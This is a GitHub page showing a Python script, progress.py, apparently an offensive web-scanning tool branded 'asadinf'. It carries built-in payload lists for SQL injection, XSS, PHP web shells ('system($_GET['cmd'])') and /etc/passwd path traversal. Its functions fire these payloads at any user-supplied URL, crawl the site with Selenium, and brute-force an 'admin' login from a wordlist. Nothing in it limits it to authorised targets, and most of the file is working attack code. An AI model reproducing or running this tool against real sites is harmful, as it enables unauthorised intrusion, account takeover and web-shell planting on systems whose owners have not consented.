-
Notifications
You must be signed in to change notification settings - Fork 0
/
progress.py
282 lines (229 loc) · 9.86 KB
/
progress.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
import requests
from bs4 import BeautifulSoup
import re
import urllib.parse
import time
from selenium import webdriver
from tqdm import tqdm # For progress bar
import os
def display_name():
#name
name_art = """
\033[32m
█████╗ ███████╗ █████╗ ██████╗ ██╗███╗ ██╗███████╗
██╔══██╗██╔════╝██╔══██╗██╔══██╗██║████╗ ██║██╔════╝
███████║███████╗███████║██████╔╝██║██╔██╗ ██║███████╗
██╔══██║╚════██║██╔══██║██╔══██╗██║██║╚██╗██║╚════██║
██║ ██║███████║██║ ██║██║ ██║██║██║ ╚████║███████║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝╚══════╝
Developed by: asadinf\033[0m
"""
tool_name = "\033[36mTool Name: web\033[0m"
print(name_art)
print(tool_name)
display_name()
def get_default_payloads():
sql_payloads = [
"' OR '1'='1",
"' OR '1'='1' --",
"' OR '1'='1' /*",
"' OR '1'='1' #",
"' UNION SELECT NULL, NULL, NULL --",
"' UNION SELECT 1, @@version, 3 --"
]
xss_payloads = [
"<script>alert('XSS')</script>",
"'\"><img src=x onerror=alert(1)>",
"<body onload=alert(1)>",
"<svg/onload=alert(1)>",
"<img src='x' onerror='alert(1)'>"
]
rce_payloads = [
"phpinfo();",
"<?php system($_GET['cmd']); ?>",
"<?php exec($_GET['cmd']); ?>",
"<?php passthru($_GET['cmd']); ?>",
"<?php shell_exec($_GET['cmd']); ?>"
]
fuzz_payloads = [
"../../../../../etc/passwd",
"../../../../../../etc/passwd",
"index.php?id=1' OR '1'='1",
"index.php?id=1' AND sleep(5)--",
"index.php?id=<script>alert(1)</script>"
]
return sql_payloads, xss_payloads, rce_payloads, fuzz_payloads
def find_links(url):
try:
response = requests.get(url)
soup = BeautifulSoup(response.text, "html.parser")
links = set()
for a_tag in soup.find_all('a', href=True):
link = urllib.parse.urljoin(url, a_tag['href'])
if url in link:
links.add(link)
return links
except Exception as e:
print(f"Error fetching links from {url}: {e}")
return set()
def sql_injection_test(url, params, sql_payloads):
vulnerable = False
for payload in sql_payloads:
for param in params:
test_params = params.copy()
test_params[param] = payload
response = requests.get(url, params=test_params)
if "SQL" in response.text or "syntax" in response.text:
print(f"Possible SQL Injection vulnerability found with payload: {payload} on param: {param}")
vulnerable = True
break
if not vulnerable:
print("No SQL Injection vulnerabilities found.")
def xss_test(url, params, xss_payloads):
vulnerable = False
for payload in xss_payloads:
for param in params:
test_params = params.copy()
test_params[param] = payload
response = requests.get(url, params=test_params)
if payload in response.text:
print(f"Possible XSS vulnerability found with payload: {payload} on param: {param}")
vulnerable = True
break
if not vulnerable:
print("No XSS vulnerabilities found.")
def rce_test(url, rce_payloads):
vulnerable = False
for payload in rce_payloads:
response = requests.get(url + payload)
if "phpinfo" in response.text or "system" in response.text:
print(f"Possible Remote Code Execution vulnerability found with payload: {payload}")
vulnerable = True
break
if not vulnerable:
print("No Remote Code Execution vulnerabilities found.")
def analyze_headers(url):
response = requests.get(url)
headers = response.headers
if 'X-Frame-Options' not in headers:
print(f"X-Frame-Options header missing on {url}")
if 'X-Content-Type-Options' not in headers:
print(f"X-Content-Type-Options header missing on {url}")
if 'Strict-Transport-Security' not in headers:
print(f"Strict-Transport-Security header missing on {url}")
def form_analysis(url):
try:
response = requests.get(url)
soup = BeautifulSoup(response.text, "html.parser")
for form in soup.find_all('form'):
action = form.get('action')
method = form.get('method', 'get').lower()
inputs = form.find_all('input')
form_url = urllib.parse.urljoin(url, action)
print(f"Form found on {form_url} with method {method.upper()}")
form_data = {}
for inp in inputs:
name = inp.get('name')
value = inp.get('value', 'test')
if name:
form_data[name] = value
sql_injection_test(form_url, form_data, sql_payloads)
xss_test(form_url, form_data, xss_payloads)
except Exception as e:
print(f"Error analyzing forms on {url}: {e}")
def brute_force_login(url, username_param, password_param, wordlist):
with open(wordlist, 'r') as file:
passwords = file.readlines()
for password in passwords:
password = password.strip()
data = {
username_param: 'admin',
password_param: password
}
response = requests.post(url, data=data)
if "Login Successful" in response.text:
print(f"Login successful with password: {password}")
break
else:
print(f"Attempted with password: {password}")
def deep_crawl_with_selenium(url):
driver = webdriver.Firefox()
driver.get(url)
time.sleep(3)
page_source = driver.page_source
soup = BeautifulSoup(page_source, 'html.parser')
links = set()
for a_tag in soup.find_all('a', href=True):
link = urllib.parse.urljoin(url, a_tag['href'])
if url in link:
links.add(link)
driver.quit()
return links
def parameter_fuzzing(url, params, fuzz_payloads):
vulnerable = False
for payload in fuzz_payloads:
for param in params:
test_params = params.copy()
test_params[param] = payload
response = requests.get(url, params=test_params)
if payload in response.text:
print(f"Parameter fuzzing found possible vulnerability with payload: {payload} on param: {param}")
vulnerable = True
if not vulnerable:
print("No vulnerabilities found with parameter fuzzing.")
def scan_website(url, sql_payloads, xss_payloads, rce_payloads, fuzz_payloads, wordlist=None):
domain_name = urllib.parse.urlparse(url).netloc.replace('.', '_')
urls_file = f"{domain_name}_all_urls.txt"
usernames_file = f"{domain_name}_all_usernames_mail.txt"
vulnerabilities_file = f"{domain_name}_vulnerabilities.txt"
links = find_links(url)
deep_links = deep_crawl_with_selenium(url)
links.update(deep_links)
with open(urls_file, 'w') as file:
for link in tqdm(links, desc="Saving URLs"):
file.write(link + '\n')
if wordlist:
with open(usernames_file, 'w') as file:
print("Starting brute force attack...")
brute_force_login(url, 'username', 'password', wordlist)
# Add brute force results to the file if needed
with open(vulnerabilities_file, 'w') as file:
for link in tqdm(links, desc="Scanning Links"):
print(f"Scanning {link} ...")
analyze_headers(link)
form_analysis(link)
rce_test(link, rce_payloads)
parameter_fuzzing(link, {}, fuzz_payloads) # You need to modify this based on your needs
time.sleep(1)
print("Scan completed.")
if __name__ == "__main__":
website_url = input("Enter the website URL (e.g., https://google.com): ")
wordlist_path = input("Enter the path to the wordlist for brute force (leave blank to skip): ")
sql_payloads_file = input("Enter path to SQL payloads file (leave blank to use default): ")
xss_payloads_file = input("Enter path to XSS payloads file (leave blank to use default): ")
rce_payloads_file = input("Enter path to RCE payloads file (leave blank to use default): ")
fuzz_payloads_file = input("Enter path to Fuzzing payloads file (leave blank to use default): ")
if sql_payloads_file:
with open(sql_payloads_file, 'r') as file:
sql_payloads = [line.strip() for line in file]
else:
sql_payloads, xss_payloads, rce_payloads, fuzz_payloads = get_default_payloads()
if xss_payloads_file:
with open(xss_payloads_file, 'r') as file:
xss_payloads = [line.strip() for line in file]
else:
if not 'xss_payloads' in locals():
xss_payloads = get_default_payloads()[1]
if rce_payloads_file:
with open(rce_payloads_file, 'r') as file:
rce_payloads = [line.strip() for line in file]
else:
if not 'rce_payloads' in locals():
rce_payloads = get_default_payloads()[2]
if fuzz_payloads_file:
with open(fuzz_payloads_file, 'r') as file:
fuzz_payloads = [line.strip() for line in file]
else:
if not 'fuzz_payloads' in locals():
fuzz_payloads = get_default_payloads()[3]
scan_website(website_url, sql_payloads, xss_payloads, rce_payloads, fuzz_payloads, wordlist_path)